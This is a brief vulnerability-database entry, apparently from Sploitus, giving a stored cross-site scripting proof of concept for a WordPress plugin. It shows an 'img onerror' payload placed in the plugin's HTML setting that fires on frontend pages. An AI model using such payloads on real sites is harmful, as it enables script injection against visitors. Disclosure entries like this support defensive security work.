Share
## https://sploitus.com/exploit?id=WPEX-ID:F360F383-0646-44CA-B49E-E2258DFBF3A6
Put the following payload in the HTML setting of the plugin, then access any page in the frontend to trigger it: <img src onerror=alert(/XSS/)>